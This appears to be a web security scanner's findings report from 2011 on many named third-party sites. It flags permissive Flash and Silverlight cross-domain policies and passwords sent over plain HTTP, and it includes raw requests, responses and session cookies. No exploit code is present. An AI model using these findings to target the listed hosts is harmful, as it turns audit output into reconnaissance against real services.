Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://netwx.accuweather.com/netWx-V212.swf?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: news.feedzilla.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Nov 2010 12:12:30 GMT Accept-Ranges: bytes ETag: "54d96c63507bcb1:0" Server: Microsoft-IIS/7.5 Date: Thu, 03 Feb 2011 16:22:30 GMT Connection: close Content-Length: 293
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: omnituretrack.local.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:06 GMT Server: Omniture DC/2.0.0 xserver: www333 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: questionmarket.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: rtsys.reachlocal.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:23:37 GMT Server: Apache Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT ETag: "cc-48103a373c180" Accept-Ranges: bytes Content-Length: 204 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: application/xml Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:52:28 GMT;path=/;httponly
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: rtsys.rtrk.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:23:40 GMT Server: Apache Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT ETag: "cc-48103a373c180" Accept-Ranges: bytes Content-Length: 204 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: application/xml Set-Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:52:21 GMT;path=/;httponly
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s.ytimg.com
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT Date: Wed, 02 Feb 2011 19:09:39 GMT Expires: Wed, 09 Feb 2011 19:09:39 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=604800 Age: 76440
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s0.2mdn.net
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Wed, 02 Feb 2011 19:09:39 GMT Expires: Thu, 03 Feb 2011 19:09:39 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=86400 Age: 76463
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s1.srtk.net
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:23:39 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 26 Jan 2011 00:57:37 GMT ETag: "1197a8-ff-49ab551aea240" Accept-Ranges: bytes Content-Length: 255 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: tags.crwdcntrl.net
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:23:50 GMT Server: Apache/2.2.8 (CentOS) Last-Modified: Tue, 09 Jun 2009 18:20:38 GMT ETag: "2958196-a5-46bee6a616980" Accept-Ranges: bytes Content-Length: 165 Vary: Accept-Encoding Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.1 Host: vortex.accuweather.com Proxy-Connection: keep-alive Referer: http://netwx.accuweather.com/netWx-V212.swf?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 09 Feb 2010 20:00:37 GMT Accept-Ranges: bytes ETag: "8020f08bc2a9ca1:2cd" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Host: origin1 Cache-Control: max-age=3600 Date: Thu, 03 Feb 2011 16:23:58 GMT Connection: close Content-Length: 1403
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: weather.weatherbug.com
Response
HTTP/1.0 200 OK Content-Length: 320 Content-Type: text/xml Last-Modified: Thu, 04 Nov 2010 12:35:42 GMT Accept-Ranges: bytes ETag: "df8e9dcb1c7ccb1:dcbe" Server: Microsoft-IIS/6.0 p3p: CP="NON DSP COR NID" X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:34:22 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.accuweather.com
Response
HTTP/1.0 200 OK Content-Length: 1403 Content-Type: text/xml Last-Modified: Tue, 09 Feb 2010 20:00:39 GMT Accept-Ranges: bytes ETag: "c28f298dc2a9ca1:a74" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:34:40 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www1.member-hsbc-group.com
Response
HTTP/1.1 200 OK Content-Length: 82 Content-Type: text/xml Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT Accept-Ranges: bytes ETag: "ef9fe45d4643c81:7da" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:29:52 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: xads.zedo.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:37 GMT Server: ZEDO 3G Last-Modified: Mon, 19 May 2008 09:02:14 GMT ETag: "4557e-f7-44d919ea43180" Accept-Ranges: bytes Content-Length: 247 Edge-Control: dca=esi P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Connection: close Content-Type: application/xml
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ziggymedia.go2cloud.org
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: api.bing.com
Response
HTTP/1.0 200 OK Cache-Control: no-cache Content-Length: 634 Content-Type: text/xml Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml" Vary: Accept-Encoding Date: Thu, 03 Feb 2011 13:42:57 GMT Connection: close Set-Cookie: _MD=alg=m2&C=2011-02-03T13%3a42%3a57; expires=Sun, 13-Feb-2011 13:42:57 GMT; domain=.bing.com; path=/ Set-Cookie: _SS=SID=FBE0622867B545E3BC3608E6771E4D62; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/ Set-Cookie: SRCHD=D=1626582&MS=1626582; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/ Set-Cookie: SRCHUID=V=2&GUID=66899BBFDACA49CA8903CE79870122B3; expires=Sat, 02-Feb-2013 13:42:57 GMT; path=/ Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110203; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-http-request-headers-from domain="*.bing.com" he ...[SNIP]... <allow-access-from domain="*.bing.com"/> ...[SNIP]... <allow-access-from domain="blstc.msn.com"/> ...[SNIP]... <allow-access-from domain="stc.sandblu.msn-int.com"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: clicks.superpages.com
Response
HTTP/1.1 200 OK Server: Unspecified ETag: W/"301-1296249771000" Last-Modified: Fri, 28 Jan 2011 21:22:51 GMT Content-Type: application/xml Content-Length: 301 Date: Thu, 03 Feb 2011 16:10:10 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.superpages.com"/><allow-access-from domain="*.bettervideo.com"/><allow-access-from domain="*.biemedia.com"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: imgssl.superpages.com
Response
HTTP/1.0 200 OK Server: Unspecified Last-Modified: Thu, 29 Nov 2007 21:24:19 GMT ETag: "87c-d2-efd546c0" Accept-Ranges: bytes Content-Length: 210 Content-Type: application/xml Date: Thu, 03 Feb 2011 16:21:56 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.superpages.com" /></cross-doma ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: media.superpages.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:22:23 GMT Server: Unspecified Last-Modified: Tue, 04 Dec 2007 18:46:47 GMT ETag: "85d-d2-4755a097" Accept-Ranges: bytes Content-Length: 210 Connection: close Content-Type: application/xml
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.superpages.com" /></cross-doma ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: static.ak.fbcdn.net
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 X-Cnection: close Date: Thu, 03 Feb 2011 16:23:48 GMT Content-Length: 1581 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: us.rd.yahoo.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:34:15 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT Accept-Ranges: bytes Content-Length: 228 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.apple.com
Response
HTTP/1.0 200 OK Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT ETag: "8d-3f8918f48ef00" Server: Apache/2.2.11 (Unix) X-N: S X-Cache-TTL: 600 X-Cached-Time: Wed, 22 Dec 2010 18:51:54 GMT Content-Type: application/xml Content-Length: 141 Cache-Control: max-age=137 Expires: Thu, 03 Feb 2011 16:37:30 GMT Date: Thu, 03 Feb 2011 16:35:13 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: advertising.microsoft.com
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 303 Content-Type: text/html Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 13:43:24 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: citi.bridgetrack.com
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 452 Content-Type: text/html Server: Date: Thu, 03 Feb 2011 13:43:00 GMT Connection: close
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.br.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 19:54:04 GMT
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 18:54:04 GMT Date: Thu, 03 Feb 2011 13:42:58 GMT
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: dev.virtualearth.net
Response
HTTP/1.1 200 OK Cache-Control: max-age=5443200 Content-Type: text/xml Last-Modified: Mon, 13 Dec 2010 18:38:09 GMT Accept-Ranges: bytes ETag: "a92e8be3f49acb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:06:48 GMT Connection: close Content-Length: 374
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: omnituretrack.local.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:06 GMT Server: Omniture DC/2.0.0 xserver: www375 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: s0.2mdn.net
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Wed, 02 Feb 2011 17:43:30 GMT Expires: Wed, 02 Feb 2011 17:43:26 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 81632 Cache-Control: public, max-age=86400
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: api.bing.com
Response
HTTP/1.0 200 OK Cache-Control: no-cache Content-Length: 348 Content-Type: text/xml Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT ETag: 3B4046BBE5F127E45C1A35A93B86C3890000015C P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml" Vary: Accept-Encoding Date: Thu, 03 Feb 2011 13:42:57 GMT Connection: close Set-Cookie: _MD=alg=m2&C=2011-02-03T13%3a42%3a57; expires=Sun, 13-Feb-2011 13:42:57 GMT; domain=.bing.com; path=/ Set-Cookie: _SS=SID=91EAB46F84594F0BBDFDA6EF008A1930; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/ Set-Cookie: SRCHD=D=1626582&MS=1626582; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/ Set-Cookie: SRCHUID=V=2&GUID=1B1BC0ECE78B4BFB99962A5130D7F53B; expires=Sat, 02-Feb-2013 13:42:57 GMT; path=/ Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110203; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/
The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.microsoft.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=900 Content-Type: text/xml Last-Modified: Tue, 12 May 2009 23:10:10 GMT Accept-Ranges: bytes ETag: "c4640cc56d3c91:0" Server: Microsoft-IIS/7.5 VTag: 279716841700000000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 17:00:16 GMT Connection: keep-alive Content-Length: 572
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET /site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972 HTTP/1.1 Host: daffodil.acsevents.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET / HTTP/1.1 Host: forums.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:05:45 GMT Server: Microsoft-IIS/6.0 Hostname: photo-02 X-Powered-By: PHP/5.2.16 Set-Cookie: session_id=140970ab83b6322d8ecbd3389e56dd24; path=/; httponly Content-type: text/html Content-Length: 140999
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]... <td align="right" valign="middle">
GET /mailman/listinfo/arin-tech-discuss HTTP/1.1 Host: lists.arin.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:10 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=us-ascii Content-Length: 12070
GET /article/SB50001424052970203537304576017783391376872.html HTTP/1.1 Host: online.barrons.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:41 GMT Server: Apache/2.0.58 (Unix) X-DEBUG-BOX-IDENT: sbkj2kapachep04 X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.4a X-DEBUG-REQUEST: /article/SB50001424052970203537304576017783391376872.html X-DEBUG-NAMESPACE: reno-barrons Set-Cookie: djcs_route=3422cf49-4bc5-4845-811c-c9461f1059b1; domain=.barrons.com; path=/; Expires=Sun Jan 31 14:14:41 2021; max-age=315360000 X-DEBUG-BOX-IDENT: sbkj2kapachep04 X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.4a X-DEBUG-REQUEST: /entitlements_handler?mg=reno-barrons&url=http%3A%2F%2Fonline.barrons.com%2Farticle%2FSB50001424052970203537304576017783391376872.html X-DEBUG-NAMESPACE: reno-barrons X-DEBUG-BOX-IDENT: sbkj2kapachep04 X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.4a X-DEBUG-REQUEST: /public/article/SB50001424052970203537304576017783391376872.html X-DEBUG-NAMESPACE: reno-barrons Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 19:14:56 GMT P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=50 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 92067
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /admin/advertisers/indexPl.jsp HTTP/1.1 Host: thestreet.adsonar.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas, TX - Search for local ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Amegy Bank in Dallas, TX - ( ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Equity Bank in Dallas, TX - ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Hillcrest Bank in Dallas, TX ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Sterling Bank in Dallas, TX - ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Coupons in Dallas, TX | Local ...[SNIP]... </p>
